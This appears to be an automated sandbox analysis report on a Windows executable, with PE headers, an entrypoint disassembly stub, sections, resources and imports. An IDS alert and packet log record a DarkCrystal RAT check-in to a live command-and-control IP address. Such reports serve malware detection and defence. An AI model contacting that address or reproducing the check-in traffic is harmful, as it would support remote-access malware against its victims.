                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:5
                                                                        OS Version Minor:1
                                                                        File Version Major:5
                                                                        File Version Minor:1
                                                                        Subsystem Version Major:5
                                                                        Subsystem Version Minor:1
                                                                        Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        call 00007F0F7168EC0Bh
                                                                        jmp 00007F0F7168E51Dh
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        push esi
                                                                        push dword ptr [ebp+08h]
                                                                        mov esi, ecx
                                                                        call 00007F0F71681367h
                                                                        mov dword ptr [esi], 004356D0h
                                                                        mov eax, esi
                                                                        pop esi
                                                                        pop ebp
                                                                        retn 0004h
                                                                        and dword ptr [ecx+04h], 00000000h
                                                                        mov eax, ecx
                                                                        and dword ptr [ecx+08h], 00000000h
                                                                        mov dword ptr [ecx+04h], 004356D8h
                                                                        mov dword ptr [ecx], 004356D0h
                                                                        ret
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        push esi
                                                                        mov esi, ecx
                                                                        lea eax, dword ptr [esi+04h]
                                                                        mov dword ptr [esi], 004356B8h
                                                                        push eax
                                                                        call 00007F0F716919AFh
                                                                        test byte ptr [ebp+08h], 00000001h
                                                                        pop ecx
                                                                        je 00007F0F7168E6ACh
                                                                        push 0000000Ch
                                                                        push esi
                                                                        call 00007F0F7168DC69h
                                                                        pop ecx
                                                                        pop ecx
                                                                        mov eax, esi
                                                                        pop esi
                                                                        pop ebp
                                                                        retn 0004h
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        sub esp, 0Ch
                                                                        lea ecx, dword ptr [ebp-0Ch]
                                                                        call 00007F0F716812E2h
                                                                        push 0043BEF0h
                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                        push eax
                                                                        call 00007F0F71691469h
                                                                        int3
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        sub esp, 0Ch
                                                                        lea ecx, dword ptr [ebp-0Ch]
                                                                        call 00007F0F7168E628h
                                                                        push 0043C0F4h
                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                        push eax
                                                                        call 00007F0F7169144Ch
                                                                        int3
                                                                        jmp 00007F0F71692EE7h
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        push 00422900h
                                                                        push dword ptr fs:[00000000h]

                                                                        Rich Headers

                                                                        Programming Language:
                                                                        • [ C ] VS2008 SP1 build 30729
                                                                        • [IMP] VS2008 SP1 build 30729

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdff8.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .rsrc0x640000xdff80xe000ba08fbcd0ed7d9e6a268d75148d9914bFalse0.6373639787946429data6.638661032196024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0x720000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        PNG0x646500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                        PNG0x651980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                        RT_ICON0x667480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                                        RT_ICON0x66cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                                        RT_ICON0x675580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                                        RT_ICON0x684000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                                        RT_ICON0x688680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                                        RT_ICON0x699100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                                        RT_ICON0x6beb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                                        RT_DIALOG0x705880x286dataEnglishUnited States0.5092879256965944
                                                                        RT_DIALOG0x703580x13adataEnglishUnited States0.60828025477707
                                                                        RT_DIALOG0x704980xecdataEnglishUnited States0.6991525423728814
                                                                        RT_DIALOG0x702280x12edataEnglishUnited States0.5927152317880795
                                                                        RT_DIALOG0x6fef00x338dataEnglishUnited States0.45145631067961167
                                                                        RT_DIALOG0x6fc980x252dataEnglishUnited States0.5757575757575758
                                                                        RT_STRING0x70f680x1e2dataEnglishUnited States0.3900414937759336
                                                                        RT_STRING0x711500x1ccdataEnglishUnited States0.4282608695652174
                                                                        RT_STRING0x713200x1b8dataEnglishUnited States0.45681818181818185
                                                                        RT_STRING0x714d80x146dataEnglishUnited States0.5153374233128835
                                                                        RT_STRING0x716200x46cdataEnglishUnited States0.3454063604240283
                                                                        RT_STRING0x71a900x166dataEnglishUnited States0.49162011173184356
                                                                        RT_STRING0x71bf80x152dataEnglishUnited States0.5059171597633136
                                                                        RT_STRING0x71d500x10adataEnglishUnited States0.49624060150375937
                                                                        RT_STRING0x71e600xbcdataEnglishUnited States0.6329787234042553
                                                                        RT_STRING0x71f200xd6dataEnglishUnited States0.5747663551401869
                                                                        RT_GROUP_ICON0x6fc300x68dataEnglishUnited States0.7019230769230769
                                                                        RT_MANIFEST0x708100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                                        Imports

                                                                        DLLImport
                                                                        KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                                        OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                        gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                                        Possible Origin

                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        EnglishUnited States

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-12-28T20:42:32.204312+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449734104.21.38.8480TCP

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Dec 28, 2024 20:42:30.805978060 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:30.925936937 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:30.926007032 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:30.927011013 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:31.050080061 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:31.283746004 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:31.403362036 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:32.156630039 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:32.204312086 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:32.399333000 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:32.399419069 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:32.399506092 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:32.466384888 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:32.585860968 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:32.786715031 CET4973580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:32.798706055 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:32.798875093 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:32.906462908 CET8049735104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:32.906723022 CET4973580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:32.906918049 CET4973580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:32.918361902 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:33.026865959 CET8049735104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:33.251089096 CET4973580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:33.291346073 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:33.370748997 CET8049735104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:33.370759964 CET8049735104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:33.370785952 CET8049735104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:33.503238916 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:33.503240108 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:33.623094082 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:33.883322954 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:33.883492947 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:34.003117085 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:34.003424883 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:34.131967068 CET8049735104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:34.204576015 CET4973580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:34.385126114 CET8049735104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:34.407548904 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:34.516585112 CET4973580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:34.524775028 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:34.617825031 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:34.620933056 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:34.740518093 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:34.953150988 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:34.953360081 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:35.073585987 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:35.073709965 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:35.300115108 CET4973580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:35.307789087 CET4973780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:35.419787884 CET8049735104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:35.420008898 CET4973580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:35.427491903 CET8049737104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:35.427634001 CET4973780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:35.438139915 CET4973780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:35.485136032 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:35.488133907 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:35.557653904 CET8049737104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:35.609067917 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:35.798444986 CET4973780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:35.821675062 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:35.821952105 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:35.918313980 CET8049737104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:35.918329000 CET8049737104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:35.918340921 CET8049737104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:35.941761017 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:35.941857100 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:36.352484941 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:36.358977079 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:36.479125023 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:36.512321949 CET8049737104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:36.610332966 CET4973780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:36.692096949 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:36.692250013 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:36.755856037 CET8049737104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:36.812959909 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:36.813085079 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:36.813472033 CET4973780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:37.096930027 CET4973980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:37.096930027 CET4973780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:37.216501951 CET8049739104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:37.216854095 CET8049737104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:37.217005968 CET4973980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:37.217005968 CET4973780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:37.218085051 CET4973980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:37.219238043 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:37.226074934 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:37.337801933 CET8049739104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:37.345633030 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:37.563827038 CET4973980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:37.579164982 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:37.715698004 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:37.716516972 CET8049739104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:37.716526031 CET8049739104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:37.716535091 CET8049739104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:37.716543913 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:37.716909885 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:37.891602993 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:37.930838108 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:37.930887938 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:38.135669947 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:38.275244951 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:38.345896006 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:38.347070932 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:38.347980976 CET8049739104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:38.466691017 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:38.488871098 CET4973980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:38.647552013 CET8049739104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:38.679655075 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:38.679819107 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:38.704169989 CET4973980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:38.799401045 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:38.799583912 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:39.204943895 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:39.205889940 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:39.325467110 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:39.538486004 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:39.538769007 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:39.658468962 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:39.658550024 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:40.063571930 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:40.070907116 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:40.190381050 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:40.403213978 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:40.403835058 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:40.524641991 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:40.524652958 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:40.938472986 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:40.950210094 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:41.069654942 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:41.282687902 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:41.283030987 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:41.402688026 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:41.402713060 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:41.812064886 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:41.813085079 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:41.933393955 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:42.145750046 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:42.145915031 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:42.265616894 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:42.265630960 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:42.680454969 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:42.688981056 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:42.808667898 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:43.021095037 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:43.027925014 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:43.149945021 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:43.149960041 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:43.512480021 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:43.515008926 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:43.635374069 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:43.848668098 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:43.850224972 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:43.969897985 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:43.970232964 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:44.376066923 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:44.483464956 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:44.603225946 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:44.816317081 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:44.816489935 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:44.920253038 CET4973980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:44.942260027 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:44.942275047 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:44.942370892 CET4974380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:45.040230989 CET8049739104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:45.040281057 CET4973980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:45.061903000 CET8049743104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:45.061965942 CET4974380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:45.062094927 CET4974380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:45.181704998 CET8049743104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:45.351804018 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:45.407532930 CET4974380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:45.425496101 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:45.527340889 CET8049743104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:45.527357101 CET8049743104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:45.527369976 CET8049743104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:45.545165062 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:45.757791042 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:45.764389038 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:45.883986950 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:45.884325027 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:46.242917061 CET8049743104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:46.299498081 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:46.300417900 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:46.313863039 CET4974380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:46.420891047 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:46.497098923 CET8049743104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:46.610361099 CET4974380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:46.633831978 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:46.634027958 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:46.756087065 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:46.756171942 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:46.778855085 CET4974380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:46.779594898 CET4974480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:46.898893118 CET8049743104.21.38.84192.168.2.4
